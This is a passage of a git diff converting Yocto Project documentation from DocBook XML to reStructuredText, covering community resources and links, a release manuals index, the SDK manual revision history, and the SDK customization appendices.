+- :oe_lists:`/g/openembedded-core` - Discussion mailing
+ list about OpenEmbedded-Core (the core metadata).
+
+- :oe_lists:`/g/openembedded-devel` - Discussion
+ mailing list about OpenEmbedded.
+
+- :oe_lists:`/g/bitbake-devel` - Discussion mailing
+ list about the :term:`BitBake` build tool.
+
+- :yocto_lists:`/g/poky` - Discussion mailing list
+ about :term:`Poky`.
+
+- :yocto_lists:`/g/yocto-announce` - Mailing list to
+ receive official Yocto Project release and milestone announcements.
+
+For more Yocto Project-related mailing lists, see the
+:yocto_home:`Yocto Project Website <>`.
+
+.. _resources-irc:
+
+Internet Relay Chat (IRC)
+=========================
+
+Two IRC channels on freenode are available for the Yocto Project and
+Poky discussions:
+
+- ``#yocto``
+
+- ``#poky``
+
+.. _resources-links-and-related-documentation:
+
+Links and Related Documentation
+===============================
+
+Here is a list of resources you might find helpful:
+
+- :yocto_home:`The Yocto Project Website <>`\ *:* The home site
+ for the Yocto Project.
+
+- :yocto_wiki:`The Yocto Project Main Wiki Page </wiki/Main_Page>`\ *:* The main wiki page for
+ the Yocto Project. This page contains information about project
+ planning, release engineering, QA & automation, a reference site map,
+ and other resources related to the Yocto Project.
+
+- :oe_home:`OpenEmbedded <>`\ *:* The build system used by the
+ Yocto Project. This project is the upstream, generic, embedded
+ distribution from which the Yocto Project derives its build system
+ (Poky) and to which it contributes.
+
+- :oe_home:`BitBake </wiki/BitBake>`\ *:* The tool
+ used to process metadata.
+
+- :doc:`BitBake User Manual <bitbake:index>`\ *:* A comprehensive
+ guide to the BitBake tool. If you want information on BitBake, see
+ this manual.
+
+- :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` *:* This
+ short document lets you experience building an image using the Yocto
+ Project without having to understand any concepts or details.
+
+- :doc:`../overview-manual/overview-manual` *:* This manual provides overview
+ and conceptual information about the Yocto Project.
+
+- :doc:`../dev-manual/dev-manual` *:* This manual is a "how-to" guide
+ that presents procedures useful to both application and system
+ developers who use the Yocto Project.
+
+- :doc:`../sdk-manual/sdk-manual` *manual :* This
+ guide provides information that lets you get going with the standard
+ or extensible SDK. An SDK, with its cross-development toolchains,
+ allows you to develop projects inside or outside of the Yocto Project
+ environment.
+
+- :doc:`../bsp-guide/bsp` *:* This guide defines the structure
+ for BSP components. Having a commonly understood structure encourages
+ standardization.
+
+- :doc:`../kernel-dev/kernel-dev` *:* This manual describes
+ how to work with Linux Yocto kernels as well as provides a bit of
+ conceptual information on the construction of the Yocto Linux kernel
+ tree.
+
+- :doc:`../ref-manual/ref-manual` *:* This
+ manual provides reference material such as variable, task, and class
+ descriptions.
+
+- :yocto_docs:`Yocto Project Mega-Manual </singleindex.html>`\ *:* This manual
+ is simply a single HTML file comprised of the bulk of the Yocto
+ Project manuals. The Mega-Manual primarily exists as a vehicle by
+ which you can easily search for phrases and terms used in the Yocto
+ Project documentation set.
+
+- :doc:`../profile-manual/profile-manual` *:* This manual presents a set of
+ common and generally useful tracing and profiling schemes along with
+ their applications (as appropriate) to each tool.
+
+- :doc:`../toaster-manual/toaster-manual` *:* This manual
+ introduces and describes how to set up and use Toaster. Toaster is an
+ Application Programming Interface (API) and web-based interface to
+ the :term:`OpenEmbedded Build System`, which uses
+ BitBake, that reports build information.
+
+- :yocto_wiki:`FAQ </wiki/FAQ>`\ *:* A list of commonly asked
+ questions and their answers.
+
+- *Release Notes:* Features, updates and known issues for the current
+ release of the Yocto Project. To access the Release Notes, go to the
+ :yocto_home:`Downloads </software-overview/downloads>` page on
+ the Yocto Project website and click on the "RELEASE INFORMATION" link
+ for the appropriate release.
+
+- :yocto_bugs:`Bugzilla <>`\ *:* The bug tracking application
+ the Yocto Project uses. If you find problems with the Yocto Project,
+ you should report them using this application.
+
+- :yocto_wiki:`Bugzilla Configuration and Bug Tracking Wiki Page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`\ *:*
+ Information on how to get set up and use the Yocto Project
+ implementation of Bugzilla for logging and tracking Yocto Project
+ defects.
+
+- *Internet Relay Chat (IRC):* Two IRC channels on freenode are
+ available for Yocto Project and Poky discussions: ``#yocto`` and
+ ``#poky``, respectively.
+
+- `Quick EMUlator (QEMU) <http://wiki.qemu.org/Index.html>`__\ *:* An
+ open-source machine emulator and virtualizer.
diff --git a/documentation/ref-manual/resources.xml b/documentation/ref-manual/resources.xml
deleted file mode 100644
index afe8e288de..0000000000
--- a/documentation/ref-manual/resources.xml
+++ /dev/null
@@ -1,297 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='resources'>
-<title>Contributions and Additional Information</title>
-
-<section id='resources-intro'>
- <title>Introduction</title>
- <para>
- The Yocto Project team is happy for people to experiment with the
- Yocto Project.
- A number of places exist to find help if you run into difficulties
- or find bugs.
- This presents information about contributing and participating in
- the Yocto Project.
- </para>
-</section>
-
-<section id='resources-contributions'>
- <title>Contributions</title>
-
- <para>
- The Yocto Project gladly accepts contributions.
- You can submit changes to the project either by creating and sending
- pull requests,
- or by submitting patches through email.
- For information on how to do both as well as information on how
- to identify the maintainer for each area of code, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='resources-bugtracker'>
- <title>Yocto Project Bugzilla</title>
-
- <para>
- The Yocto Project uses its own implementation of
- <ulink url='&YOCTO_BUGZILLA_URL;'>Bugzilla</ulink> to
- track defects (bugs).
- Implementations of Bugzilla work well for group development because
- they track bugs and code changes, can be used to communicate changes
- and problems with developers, can be used to submit and review patches,
- and can be used to manage quality assurance.
- </para>
-
- <para>
- Sometimes it is helpful to submit, investigate, or track a bug against
- the Yocto Project itself (e.g. when discovering an issue with some
- component of the build system that acts contrary to the documentation
- or your expectations).
- </para>
-
- <para>
- A general procedure and guidelines exist for when you use Bugzilla to
- submit a bug.
- For information on how to use Bugzilla to submit a bug against the
- Yocto Project, see the following:
- <itemizedlist>
- <listitem><para>
- The
- "<ulink url='&YOCTO_DOCS_DEV_URL;#submitting-a-defect-against-the-yocto-project'>Submitting a Defect Against the Yocto Project</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- The Yocto Project
- <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla wiki page</ulink>
- </para></listitem>
- </itemizedlist>
- For information on Bugzilla in general, see
- <ulink url='http://www.bugzilla.org/about/'></ulink>.
- </para>
-</section>
-
-<section id='resources-mailinglist'>
- <title>Mailing lists</title>
-
- <para>
- A number of mailing lists maintained by the Yocto Project exist
- as well as related OpenEmbedded mailing lists for discussion,
- patch submission and announcements.
- To subscribe to one of the following mailing lists, click on the
- appropriate URL in the following list and follow the instructions:
- <itemizedlist>
- <listitem><para><ulink url='&YOCTO_LISTS_URL;/listinfo/yocto'></ulink> -
- General Yocto Project discussion mailing list. </para></listitem>
- <listitem><para><ulink url='&OE_LISTS_URL;/listinfo/openembedded-core'></ulink> -
- Discussion mailing list about OpenEmbedded-Core (the core metadata).</para></listitem>
- <listitem><para><ulink url='&OE_LISTS_URL;/listinfo/openembedded-devel'></ulink> -
- Discussion mailing list about OpenEmbedded.</para></listitem>
- <listitem><para><ulink url='&OE_LISTS_URL;/listinfo/bitbake-devel'></ulink> -
- Discussion mailing list about the
- <link linkend='bitbake-term'>BitBake</link>
- build tool.</para></listitem>
- <listitem><para><ulink url='&YOCTO_LISTS_URL;/listinfo/poky'></ulink> -
- Discussion mailing list about
- <link linkend='poky'>Poky</link>.
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_LISTS_URL;/listinfo/yocto-announce'></ulink> -
- Mailing list to receive official Yocto Project release and milestone
- announcements.</para></listitem>
- </itemizedlist>
- </para>
- For more Yocto Project-related mailing lists, see the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
-</section>
-
-<section id='resources-irc'>
- <title>Internet Relay Chat (IRC)</title>
-
- <para>
- Two IRC channels on freenode are available for the Yocto Project and Poky discussions:
- <itemizedlist>
- <listitem><para><filename>#yocto</filename></para></listitem>
- <listitem><para><filename>#poky</filename></para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='resources-links-and-related-documentation'>
- <title>Links and Related Documentation</title>
-
- <para>
- Here is a list of resources you might find helpful:
- <itemizedlist>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_HOME_URL;'>The Yocto Project website</ulink>:
- </emphasis> The home site for the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_WIKI_URL;/wiki/Main_Page'>The Yocto Project Main Wiki Page</ulink>:
- </emphasis>
- The main wiki page for the Yocto Project.
- This page contains information about project planning,
- release engineering, QA &amp; automation, a reference
- site map, and other resources related to the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&OE_HOME_URL;'>OpenEmbedded</ulink>:
- </emphasis>
- The build system used by the Yocto Project.
- This project is the upstream, generic, embedded distribution
- from which the Yocto Project derives its build system (Poky)
- and to which it contributes.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='http://www.openembedded.org/wiki/BitBake'>
- BitBake</ulink>:
- </emphasis> The tool used to process metadata.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>:
- </emphasis>
- A comprehensive guide to the BitBake tool.
- If you want information on BitBake, see this manual.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>:
- </emphasis>
- This short document lets you experience building an image using
- the Yocto Project without having to understand any concepts or
- details.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>:
- </emphasis>
- This manual provides overview and conceptual information
- about the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_DEV_URL;'>Yocto Project Development Tasks Manual</ulink>:
- </emphasis>
- This manual is a "how-to" guide that presents procedures
- useful to both application and system developers who use the
- Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual:</emphasis>
- This guide provides information that lets you get going
- with the standard or extensible SDK.
- An SDK, with its cross-development toolchains, allows you
- to develop projects inside or outside of the Yocto Project
- environment.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>:
- </emphasis>
- This guide defines the structure for BSP components.
- Having a commonly understood structure encourages
- standardization.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;'>Yocto Project Linux Kernel Development Manual</ulink>:
- </emphasis>
- This manual describes how to work with Linux Yocto kernels as
- well as provides a bit of conceptual information on the
- construction of the Yocto Linux kernel tree.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_REF_URL;'>Yocto Project Reference Manual</ulink>:
- </emphasis>
- This manual provides reference material such as variable,
- task, and class descriptions.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_MM_URL;'>Yocto Project Mega-Manual</ulink>:
- </emphasis>
- This manual is simply a single HTML file comprised of the
- bulk of the Yocto Project manuals.
- The Mega-Manual primarily exists as a vehicle by which you can
- easily search for phrases and terms used in the Yocto Project
- documentation set.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_PROF_URL;'>Yocto Project Profiling and Tracing Manual</ulink>:
- </emphasis>
- This manual presents a set of common and generally useful
- tracing and profiling schemes along with their applications
- (as appropriate) to each tool.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>:
- </emphasis>
- This manual introduces and describes how to set up and use
- Toaster.
- Toaster is an Application Programming Interface (API) and
- web-based interface to the
- <link linkend='build-system-term'>OpenEmbedded Build System</link>,
- which uses BitBake, that reports build information.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_WIKI_URL;/wiki/FAQ'>FAQ</ulink>:
- </emphasis>
- A list of commonly asked questions and their answers.
- </para></listitem>
- <listitem><para>
- <emphasis>Release Notes:</emphasis>
- Features, updates and known issues for the current
- release of the Yocto Project.
- To access the Release Notes, go to the
- <ulink url='&YOCTO_HOME_URL;/software-overview/downloads/'>Downloads</ulink>
- page on the Yocto Project website and click on the
- "RELEASE INFORMATION" link for the appropriate release.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_BUGZILLA_URL;'>Bugzilla</ulink>:
- </emphasis>
- The bug tracking application the Yocto Project uses.
- If you find problems with the Yocto Project, you should report
- them using this application.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla Configuration and Bug Tracking Wiki Page</ulink>:
- </emphasis>
- Information on how to get set up and use the Yocto Project
- implementation of Bugzilla for logging and tracking Yocto
- Project defects.
- </para></listitem>
- <listitem><para>
- <emphasis>Internet Relay Chat (IRC):</emphasis>
- Two IRC channels on freenode are available
- for Yocto Project and Poky discussions: <filename>#yocto</filename> and
- <filename>#poky</filename>, respectively.
- </para></listitem>
- <listitem><para>
- <emphasis>
- <ulink url='http://wiki.qemu.org/Index.html'>Quick EMUlator (QEMU)</ulink>:
- </emphasis>
- An open-source machine emulator and virtualizer.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/releases.rst b/documentation/releases.rst
new file mode 100644
index 0000000000..affe63403c
--- /dev/null
+++ b/documentation/releases.rst
@@ -0,0 +1,228 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+===========================
+ Supported Release Manuals
+===========================
+
+******************************
+Release Series 3.4 (honister)
+******************************
+
+- :yocto_docs:`3.4 Documentation </3.4>`
+- :yocto_docs:`3.4.1 Documentation </3.4.1>`
+
+******************************
+Release Series 3.3 (hardknott)
+******************************
+
+- :yocto_docs:`3.3 Documentation </3.3>`
+- :yocto_docs:`3.3.1 Documentation </3.3.1>`
+- :yocto_docs:`3.3.2 Documentation </3.3.2>`
+- :yocto_docs:`3.3.3 Documentation </3.3.3>`
+- :yocto_docs:`3.3.4 Documentation </3.3.4>`
+
+****************************
+Release Series 3.1 (dunfell)
+****************************
+
+- :yocto_docs:`3.1 Documentation </3.1>`
+- :yocto_docs:`3.1.1 Documentation </3.1.1>`
+- :yocto_docs:`3.1.2 Documentation </3.1.2>`
+- :yocto_docs:`3.1.3 Documentation </3.1.3>`
+- :yocto_docs:`3.1.4 Documentation </3.1.4>`
+- :yocto_docs:`3.1.5 Documentation </3.1.5>`
+- :yocto_docs:`3.1.6 Documentation </3.1.6>`
+- :yocto_docs:`3.1.7 Documentation </3.1.7>`
+- :yocto_docs:`3.1.8 Documentation </3.1.8>`
+- :yocto_docs:`3.1.9 Documentation </3.1.9>`
+- :yocto_docs:`3.1.10 Documentation </3.1.10>`
+- :yocto_docs:`3.1.11 Documentation </3.1.11>`
+- :yocto_docs:`3.1.12 Documentation </3.1.12>`
+- :yocto_docs:`3.1.13 Documentation </3.1.13>`
+- :yocto_docs:`3.1.14 Documentation </3.1.14>`
+
+==========================
+ Outdated Release Manuals
+==========================
+
+*******************************
+Release Series 3.2 (gatesgarth)
+*******************************
+
+- :yocto_docs:`3.2 Documentation </3.2>`
+- :yocto_docs:`3.2.1 Documentation </3.2.1>`
+- :yocto_docs:`3.2.2 Documentation </3.2.2>`
+- :yocto_docs:`3.2.3 Documentation </3.2.3>`
+- :yocto_docs:`3.2.4 Documentation </3.2.4>`
+
+*************************
+Release Series 3.0 (zeus)
+*************************
+
+- :yocto_docs:`3.0 Documentation </3.0>`
+- :yocto_docs:`3.0.1 Documentation </3.0.1>`
+- :yocto_docs:`3.0.2 Documentation </3.0.2>`
+- :yocto_docs:`3.0.3 Documentation </3.0.3>`
+- :yocto_docs:`3.0.4 Documentation </3.0.4>`
+
+****************************
+Release Series 2.7 (warrior)
+****************************
+
+- :yocto_docs:`2.7 Documentation </2.7>`
+- :yocto_docs:`2.7.1 Documentation </2.7.1>`
+- :yocto_docs:`2.7.2 Documentation </2.7.2>`
+- :yocto_docs:`2.7.3 Documentation </2.7.3>`
+- :yocto_docs:`2.7.4 Documentation </2.7.4>`
+
+*************************
+Release Series 2.6 (thud)
+*************************
+
+- :yocto_docs:`2.6 Documentation </2.6>`
+- :yocto_docs:`2.6.1 Documentation </2.6.1>`
+- :yocto_docs:`2.6.2 Documentation </2.6.2>`
+- :yocto_docs:`2.6.3 Documentation </2.6.3>`
+- :yocto_docs:`2.6.4 Documentation </2.6.4>`
+
+*************************
+Release Series 2.5 (sumo)
+*************************
+
+- :yocto_docs:`2.5 Documentation </2.5>`
+- :yocto_docs:`2.5.1 Documentation </2.5.1>`
+- :yocto_docs:`2.5.2 Documentation </2.5.2>`
+- :yocto_docs:`2.5.3 Documentation </2.5.3>`
+
+**************************
+Release Series 2.4 (rocko)
+**************************
+
+- :yocto_docs:`2.4 Documentation </2.4>`
+- :yocto_docs:`2.4.1 Documentation </2.4.1>`
+- :yocto_docs:`2.4.2 Documentation </2.4.2>`
+- :yocto_docs:`2.4.3 Documentation </2.4.3>`
+- :yocto_docs:`2.4.4 Documentation </2.4.4>`
+
+*************************
+Release Series 2.3 (pyro)
+*************************
+
+- :yocto_docs:`2.3 Documentation </2.3>`
+- :yocto_docs:`2.3.1 Documentation </2.3.1>`
+- :yocto_docs:`2.3.2 Documentation </2.3.2>`
+- :yocto_docs:`2.3.3 Documentation </2.3.3>`
+- :yocto_docs:`2.3.4 Documentation </2.3.4>`
+
+**************************
+Release Series 2.2 (morty)
+**************************
+
+- :yocto_docs:`2.2 Documentation </2.2>`
+- :yocto_docs:`2.2.1 Documentation </2.2.1>`
+- :yocto_docs:`2.2.2 Documentation </2.2.2>`
+- :yocto_docs:`2.2.3 Documentation </2.2.3>`
+
+****************************
+Release Series 2.1 (krogoth)
+****************************
+
+- :yocto_docs:`2.1 Documentation </2.1>`
+- :yocto_docs:`2.1.1 Documentation </2.1.1>`
+- :yocto_docs:`2.1.2 Documentation </2.1.2>`
+- :yocto_docs:`2.1.3 Documentation </2.1.3>`
+
+***************************
+Release Series 2.0 (jethro)
+***************************
+
+- :yocto_docs:`1.9 Documentation </1.9>`
+- :yocto_docs:`2.0 Documentation </2.0>`
+- :yocto_docs:`2.0.1 Documentation </2.0.1>`
+- :yocto_docs:`2.0.2 Documentation </2.0.2>`
+- :yocto_docs:`2.0.3 Documentation </2.0.3>`
+
+*************************
+Release Series 1.8 (fido)
+*************************
+
+- :yocto_docs:`1.8 Documentation </1.8>`
+- :yocto_docs:`1.8.1 Documentation </1.8.1>`
+- :yocto_docs:`1.8.2 Documentation </1.8.2>`
+
+**************************
+Release Series 1.7 (dizzy)
+**************************
+
+- :yocto_docs:`1.7 Documentation </1.7>`
+- :yocto_docs:`1.7.1 Documentation </1.7.1>`
+- :yocto_docs:`1.7.2 Documentation </1.7.2>`
+- :yocto_docs:`1.7.3 Documentation </1.7.3>`
+
+**************************
+Release Series 1.6 (daisy)
+**************************
+
+- :yocto_docs:`1.6 Documentation </1.6>`
+- :yocto_docs:`1.6.1 Documentation </1.6.1>`
+- :yocto_docs:`1.6.2 Documentation </1.6.2>`
+- :yocto_docs:`1.6.3 Documentation </1.6.3>`
+
+*************************
+Release Series 1.5 (dora)
+*************************
+
+- :yocto_docs:`1.5 Documentation </1.5>`
+- :yocto_docs:`1.5.1 Documentation </1.5.1>`
+- :yocto_docs:`1.5.2 Documentation </1.5.2>`
+- :yocto_docs:`1.5.3 Documentation </1.5.3>`
+- :yocto_docs:`1.5.4 Documentation </1.5.4>`
+
+**************************
+Release Series 1.4 (dylan)
+**************************
+
+- :yocto_docs:`1.4 Documentation </1.4>`
+- :yocto_docs:`1.4.1 Documentation </1.4.1>`
+- :yocto_docs:`1.4.2 Documentation </1.4.2>`
+- :yocto_docs:`1.4.3 Documentation </1.4.3>`
+- :yocto_docs:`1.4.4 Documentation </1.4.4>`
+- :yocto_docs:`1.4.5 Documentation </1.4.5>`
+
+**************************
+Release Series 1.3 (danny)
+**************************
+
+- :yocto_docs:`1.3 Documentation </1.3>`
+- :yocto_docs:`1.3.1 Documentation </1.3.1>`
+- :yocto_docs:`1.3.2 Documentation </1.3.2>`
+
+***************************
+Release Series 1.2 (denzil)
+***************************
+
+- :yocto_docs:`1.2 Documentation </1.2>`
+- :yocto_docs:`1.2.1 Documentation </1.2.1>`
+- :yocto_docs:`1.2.2 Documentation </1.2.2>`
+
+***************************
+Release Series 1.1 (edison)
+***************************
+
+- :yocto_docs:`1.1 Documentation </1.1>`
+- :yocto_docs:`1.1.1 Documentation </1.1.1>`
+- :yocto_docs:`1.1.2 Documentation </1.1.2>`
+
+****************************
+Release Series 1.0 (bernard)
+****************************
+
+- :yocto_docs:`1.0 Documentation </1.0>`
+- :yocto_docs:`1.0.1 Documentation </1.0.1>`
+- :yocto_docs:`1.0.2 Documentation </1.0.2>`
+
+****************************
+Release Series 0.9 (laverne)
+****************************
+
+- :yocto_docs:`0.9 Documentation </0.9>`
diff --git a/documentation/sdk-manual/history.rst b/documentation/sdk-manual/history.rst
new file mode 100644
index 0000000000..5562eb7894
--- /dev/null
+++ b/documentation/sdk-manual/history.rst
@@ -0,0 +1,52 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 2.1
+ - April 2016
+ - The initial document released with the Yocto Project 2.1 Release
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/sdk-manual/sdk-appendix-customizing-standard.rst b/documentation/sdk-manual/sdk-appendix-customizing-standard.rst
new file mode 100644
index 0000000000..90b634529e
--- /dev/null
+++ b/documentation/sdk-manual/sdk-appendix-customizing-standard.rst
@@ -0,0 +1,34 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+****************************
+Customizing the Standard SDK
+****************************
+
+This appendix presents customizations you can apply to the standard SDK.
+
+Adding Individual Packages to the Standard SDK
+==============================================
+
+When you build a standard SDK using the ``bitbake -c populate_sdk``, a
+default set of packages is included in the resulting SDK. The
+:term:`TOOLCHAIN_HOST_TASK`
+and
+:term:`TOOLCHAIN_TARGET_TASK`
+variables control the set of packages adding to the SDK.
+
+If you want to add individual packages to the toolchain that runs on the
+host, simply add those packages to the ``TOOLCHAIN_HOST_TASK`` variable.
+Similarly, if you want to add packages to the default set that is part
+of the toolchain that runs on the target, add the packages to the
+``TOOLCHAIN_TARGET_TASK`` variable.
+
+Adding API Documentation to the Standard SDK
+============================================
+
+You can include API documentation as well as any other documentation
+provided by recipes with the standard SDK by adding "api-documentation"
+to the
+:term:`DISTRO_FEATURES`
+variable: DISTRO_FEATURES_append = " api-documentation" Setting this
+variable as shown here causes the OpenEmbedded build system to build the
+documentation and then include it in the standard SDK.
diff --git a/documentation/sdk-manual/sdk-appendix-customizing-standard.xml b/documentation/sdk-manual/sdk-appendix-customizing-standard.xml
deleted file mode 100644
index f20891c80d..0000000000
--- a/documentation/sdk-manual/sdk-appendix-customizing-standard.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='sdk-appendix-customizing-standard'>
-
-<title>Customizing the Standard SDK</title>
-
-<para>
- This appendix presents customizations you can apply to the standard SDK.
-</para>
-
-<section id='sdk-adding-individual-packages'>
- <title>Adding Individual Packages to the Standard SDK</title>
-
- <para>
- When you build a standard SDK using the
- <filename>bitbake -c populate_sdk</filename>, a default set of
- packages is included in the resulting SDK.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_HOST_TASK'><filename>TOOLCHAIN_HOST_TASK</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_TARGET_TASK'><filename>TOOLCHAIN_TARGET_TASK</filename></ulink>
- variables control the set of packages adding to the SDK.
- </para>
-
- <para>
- If you want to add individual packages to the toolchain that runs on
- the host, simply add those packages to the
- <filename>TOOLCHAIN_HOST_TASK</filename> variable.
- Similarly, if you want to add packages to the default set that is
- part of the toolchain that runs on the target, add the packages to the
- <filename>TOOLCHAIN_TARGET_TASK</filename> variable.
- </para>
-</section>
-
-<section id='adding-api-documentation-to-the-standard-sdk'>
- <title>Adding API Documentation to the Standard SDK</title>
-
- <para>
- You can include API documentation as well as any other
- documentation provided by recipes with the standard SDK by
- adding "api-documentation" to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
- variable:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_append = " api-documentation"
- </literallayout>
- Setting this variable as shown here causes the OpenEmbedded build
- system to build the documentation and then include it in the standard
- SDK.
- </para>
-</section>
-
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-appendix-customizing.rst b/documentation/sdk-manual/sdk-appendix-customizing.rst
new file mode 100644
index 0000000000..5a33f6385e
--- /dev/null
+++ b/documentation/sdk-manual/sdk-appendix-customizing.rst
@@ -0,0 +1,377 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************
+Customizing the Extensible SDK
+******************************
+
+This appendix describes customizations you can apply to the extensible
+SDK.
+
+Configuring the Extensible SDK
+==============================
+
+The extensible SDK primarily consists of a pre-configured copy of the
+OpenEmbedded build system from which it was produced. Thus, the SDK's
+configuration is derived using that build system and the filters shown
+in the following list. When these filters are present, the OpenEmbedded
+build system applies them against ``local.conf`` and ``auto.conf``:
+
+- Variables whose values start with "/" are excluded since the
+ assumption is that those values are paths that are likely to be
+ specific to the :term:`Build Host`.
+
+- Variables listed in
+ :term:`SDK_LOCAL_CONF_BLACKLIST`
+ are excluded. These variables are not allowed through from the
+ OpenEmbedded build system configuration into the extensible SDK
+ configuration. Typically, these variables are specific to the machine
+ on which the build system is running and could be problematic as part
+ of the extensible SDK configuration.
+
+ For a list of the variables excluded by default, see the
+ :term:`SDK_LOCAL_CONF_BLACKLIST`
+ in the glossary of the Yocto Project Reference Manual.
+
+- Variables listed in
+ :term:`SDK_LOCAL_CONF_WHITELIST`
+ are included. Including a variable in the value of
+ ``SDK_LOCAL_CONF_WHITELIST`` overrides either of the previous two
+ filters. The default value is blank.
+
+- Classes inherited globally with
+ :term:`INHERIT` that are listed in
+ :term:`SDK_INHERIT_BLACKLIST`
+ are disabled. Using ``SDK_INHERIT_BLACKLIST`` to disable these
+ classes is the typical method to disable classes that are problematic
+ or unnecessary in the SDK context. The default value blacklists the
+ :ref:`buildhistory <ref-classes-buildhistory>`
+ and :ref:`icecc <ref-classes-icecc>` classes.
+
+Additionally, the contents of ``conf/sdk-extra.conf``, when present, are
+appended to the end of ``conf/local.conf`` within the produced SDK,
+without any filtering. The ``sdk-extra.conf`` file is particularly
+useful if you want to set a variable value just for the SDK and not the
+OpenEmbedded build system used to create the SDK.
+
+Adjusting the Extensible SDK to Suit Your Build Host's Setup
+============================================================
+
+In most cases, the extensible SDK defaults should work with your :term:`Build
+Host`'s setup.
+However, some cases exist for which you might consider making
+adjustments:
+
+- If your SDK configuration inherits additional classes using the
+ :term:`INHERIT` variable and you
+ do not need or want those classes enabled in the SDK, you can
+ blacklist them by adding them to the
+ :term:`SDK_INHERIT_BLACKLIST`
+ variable as described in the fourth bullet of the previous section.
+
+ .. note::
+
+ The default value of
+ SDK_INHERIT_BLACKLIST
+ is set using the "?=" operator. Consequently, you will need to
+ either define the entire list by using the "=" operator, or you
+ will need to append a value using either "_append" or the "+="
+ operator. You can learn more about these operators in the "
+ Basic Syntax
+ " section of the BitBake User Manual.
+
+ .
+
+- If you have classes or recipes that add additional tasks to the
+ standard build flow (i.e. the tasks execute as the recipe builds as
+ opposed to being called explicitly), then you need to do one of the
+ following:
+
+ - After ensuring the tasks are :ref:`shared
